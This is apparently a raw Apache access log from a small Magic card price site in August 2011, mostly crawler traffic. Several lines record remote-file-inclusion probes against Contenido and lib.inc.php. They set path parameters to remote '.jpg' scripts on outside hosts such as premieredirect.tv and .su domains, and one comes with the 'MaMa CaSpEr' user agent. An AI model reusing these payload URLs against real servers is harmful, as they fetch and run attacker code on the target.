66.219.58.41 - - [25/Aug/2011:15:55:32 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "MLBot (www.metadatalabs.com/mlbot)"
88.131.106.6 - - [25/Aug/2011:16:02:17 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.2 - - [25/Aug/2011:16:02:31 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
67.195.115.166 - - [25/Aug/2011:16:04:58 +0000] "GET /?C=D;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.98 - - [25/Aug/2011:16:31:38 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [25/Aug/2011:16:32:16 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 124145 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
95.108.158.245 - - [25/Aug/2011:16:48:43 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
38.101.148.126 - - [25/Aug/2011:16:55:02 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
95.108.158.245 - - [25/Aug/2011:17:06:01 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
69.171.163.96 - - [25/Aug/2011:20:01:13 +0000] "GET / HTTP/1.1" 200 749 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4ADSA_enUS384US421&q=pojo+magic+card+price+guide" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 1.1.4322; AskTbCDS/5.12.2.16749)"
69.171.163.96 - - [25/Aug/2011:20:01:14 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 1.1.4322; AskTbCDS/5.12.2.16749)"
69.171.163.96 - - [25/Aug/2011:20:01:14 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 1.1.4322; AskTbCDS/5.12.2.16749)"
69.171.163.96 - - [25/Aug/2011:20:01:15 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 1.1.4322; AskTbCDS/5.12.2.16749)"
38.101.148.126 - - [25/Aug/2011:21:43:55 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
38.101.148.126 - - [25/Aug/2011:21:58:17 +0000] "GET /Account/AwstatsDatabase/?C=N;O=A HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
67.195.115.166 - - [25/Aug/2011:22:26:01 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [25/Aug/2011:22:26:02 +0000] "GET /Account/?C=S;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [25/Aug/2011:22:26:20 +0000] "GET /Account/?C=S;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.52.143.32 - - [25/Aug/2011:22:57:45 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
38.101.148.126 - - [25/Aug/2011:23:23:13 +0000] "GET /Account/AwstatsDatabase/?C=M;O=D HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
38.101.148.126 - - [25/Aug/2011:23:25:14 +0000] "GET /Account/AwstatsDatabase/?C=S;O=D HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
207.46.13.98 - - [25/Aug/2011:23:46:40 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [25/Aug/2011:23:47:36 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
212.113.35.162 - - [26/Aug/2011:00:36:26 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [26/Aug/2011:00:36:27 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [26/Aug/2011:00:36:29 +0000] "GET /?C=D;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [26/Aug/2011:00:36:31 +0000] "GET /Account/?C=D;O=D HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
212.113.35.162 - - [26/Aug/2011:00:36:32 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 128867 "-" "Mozilla/5.0 (compatible; AhrefsBot/1.0; +http://ahrefs.com/robot/)"
184.154.48.82 - - [26/Aug/2011:00:48:27 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.0; http://www.majestic12.co.uk/bot.php?+)"
184.154.48.82 - - [26/Aug/2011:00:48:28 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.0; http://www.majestic12.co.uk/bot.php?+)"
67.195.115.166 - - [26/Aug/2011:02:23:15 +0000] "GET /?C=S;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.114 - - [26/Aug/2011:03:03:31 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.114 - - [26/Aug/2011:03:03:31 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.63.196.107 - - [26/Aug/2011:04:43:44 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
38.101.148.126 - - [26/Aug/2011:05:48:14 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
67.195.115.166 - - [26/Aug/2011:09:07:26 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [26/Aug/2011:09:07:27 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [26/Aug/2011:10:33:10 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
119.63.196.23 - - [26/Aug/2011:11:30:55 +0000] "GET /?C=S;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
95.108.158.245 - - [26/Aug/2011:13:06:42 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
193.47.80.51 - - [26/Aug/2011:14:08:57 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [26/Aug/2011:14:08:57 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
38.101.148.126 - - [26/Aug/2011:15:15:13 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
95.108.158.245 - - [26/Aug/2011:15:45:34 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
95.108.158.245 - - [26/Aug/2011:16:34:54 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
217.16.9.5 - - [26/Aug/2011:19:36:19 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','10','10','%22%2Fcontenido%2Fincludes%22','',%20'00d938e244e67ed6b7b1d615b94dd52586b87552a72d64647d6c',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:20 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','10','10','%22%2Fcontenido%2Fincludes%22','',%20'00d938e244e67ed6b7b1d615b94dd52586b87552a72d64647d6c',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java1.jpg?? HTTP/1.1" 404 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:22 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','10','10','%22%2Fcontenido%2Fincludes%22','',%20'00d938e244e67ed6b7b1d615b94dd52586b87552a72d64647d6c',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java2.jpg?? HTTP/1.1" 404 588 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:23 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:24 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java1.jpg?? HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:25 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java2.jpg?? HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:27 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:28 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java1.jpg?? HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:29 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java2.jpg?? HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:31 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','1','%22%2Fcontenido%2Fincludes%22','',%20'00d605e3dd5ff08dbdb5ab205a65c366ea06127905225965e596',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 587 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:32 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','1','%22%2Fcontenido%2Fincludes%22','',%20'00d605e3dd5ff08dbdb5ab205a65c366ea06127905225965e596',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java1.jpg?? HTTP/1.1" 404 587 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:33 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','1','%22%2Fcontenido%2Fincludes%22','',%20'00d605e3dd5ff08dbdb5ab205a65c366ea06127905225965e596',%200)//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java2.jpg?? HTTP/1.1" 404 587 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:46 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:47 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java1.jpg?? HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:48 +0000] "GET /Account//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java2.jpg?? HTTP/1.1" 404 377 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:50 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=test?? HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:51 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java1.jpg?? HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.16.9.5 - - [26/Aug/2011:19:36:52 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://premieredirect.tv/catalog/images/java2.jpg?? HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
38.101.148.126 - - [26/Aug/2011:19:57:45 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
207.46.13.98 - - [26/Aug/2011:22:58:06 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.98 - - [26/Aug/2011:22:58:59 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 138270 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
38.101.148.126 - - [27/Aug/2011:01:47:57 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
208.80.194.33 - - [27/Aug/2011:04:43:46 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; yplus 5.1.04b)"
38.108.67.17 - - [27/Aug/2011:04:55:15 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
38.108.67.17 - - [27/Aug/2011:04:55:15 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.0" 404 339 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
38.101.148.126 - - [27/Aug/2011:07:28:02 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
123.125.71.107 - - [27/Aug/2011:07:30:11 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [27/Aug/2011:09:14:00 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [27/Aug/2011:09:14:00 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.196.85 - - [27/Aug/2011:11:13:02 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [27/Aug/2011:11:46:53 +0000] "GET /Account/?C=D;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [27/Aug/2011:11:50:29 +0000] "GET /Account/?C=D;O=D HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [27/Aug/2011:12:10:07 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
95.108.158.245 - - [27/Aug/2011:13:01:58 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
119.63.196.45 - - [27/Aug/2011:13:45:08 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.108.158.245 - - [27/Aug/2011:15:01:38 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [27/Aug/2011:16:20:57 +0000] "GET /?C=D;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [27/Aug/2011:16:52:07 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
95.108.158.245 - - [27/Aug/2011:18:34:21 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
112.201.108.225 - - [27/Aug/2011:19:23:31 +0000] "GET / HTTP/1.1" 200 749 "http://www.pojo.com/magic/Deck%20Garage/jason/2004/032904.html" "Opera/9.80 (Macintosh; Intel Mac OS X 10.7.1; U; en) Presto/2.9.168 Version/11.50"
112.201.108.225 - - [27/Aug/2011:19:23:32 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "http://pojo.findmagiccards.com/" "Opera/9.80 (Macintosh; Intel Mac OS X 10.7.1; U; en) Presto/2.9.168 Version/11.50"
112.201.108.225 - - [27/Aug/2011:19:23:33 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Opera/9.80 (Macintosh; Intel Mac OS X 10.7.1; U; en) Presto/2.9.168 Version/11.50"
112.201.108.225 - - [27/Aug/2011:19:23:33 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Opera/9.80 (Macintosh; Intel Mac OS X 10.7.1; U; en) Presto/2.9.168 Version/11.50"
67.195.115.166 - - [27/Aug/2011:20:54:21 +0000] "GET /?C=N;O=D HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
157.55.17.147 - - [27/Aug/2011:21:03:12 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.147 - - [27/Aug/2011:21:03:46 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 142644 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
38.101.148.126 - - [27/Aug/2011:21:32:24 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
38.101.148.126 - - [28/Aug/2011:02:12:14 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
119.63.196.91 - - [28/Aug/2011:02:40:58 +0000] "GET /Account/AwstatsDatabase/?C=M;O=A HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
193.47.80.51 - - [28/Aug/2011:03:31:54 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
193.47.80.51 - - [28/Aug/2011:03:31:54 +0000] "GET /?C=D;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
123.125.71.99 - - [28/Aug/2011:06:19:05 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
38.101.148.126 - - [28/Aug/2011:06:50:30 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
157.55.16.230 - - [28/Aug/2011:07:56:23 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.16.230 - - [28/Aug/2011:07:57:00 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
95.108.158.245 - - [28/Aug/2011:08:44:00 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
67.195.115.166 - - [28/Aug/2011:09:17:33 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [28/Aug/2011:09:17:33 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.196.78 - - [28/Aug/2011:10:42:49 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
95.108.158.245 - - [28/Aug/2011:11:21:52 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
38.101.148.126 - - [28/Aug/2011:11:25:34 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)"
67.195.115.166 - - [28/Aug/2011:11:26:50 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [28/Aug/2011:11:26:51 +0000] "GET /?C=M;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.40.79.217 - - [28/Aug/2011:13:45:01 +0000] "GET /Account//include/lib.inc.php?site_path=test?? HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
213.40.79.217 - - [28/Aug/2011:13:45:02 +0000] "GET /Account//include/lib.inc.php?site_path=http://sadsad.wen.su/sad.jpg?? HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
213.40.79.217 - - [28/Aug/2011:13:45:03 +0000] "GET /Account//include/lib.inc.php?site_path=http://parepare.nab.su/parepare.jpg?? HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
213.40.79.217 - - [28/Aug/2011:13:45:04 +0000] "GET //include/lib.inc.php?site_path=test?? HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
213.40.79.217 - - [28/Aug/2011:13:45:06 +0000] "GET //include/lib.inc.php?site_path=http://sadsad.wen.su/sad.jpg?? HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
213.40.79.217 - - [28/Aug/2011:13:45:07 +0000] "GET //include/lib.inc.php?site_path=http://parepare.nab.su/parepare.jpg?? HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.125.71.112 - - [28/Aug/2011:15:10:59 +0000] "GET /?C=S;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
66.71.188.13 - - [28/Aug/2011:15:58:05 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://seeclearlyaccounting.com/recipe/seeclearlyaccounting.jpg?? HTTP/1.1" 404 368 "-" "MaMa CaSpEr"
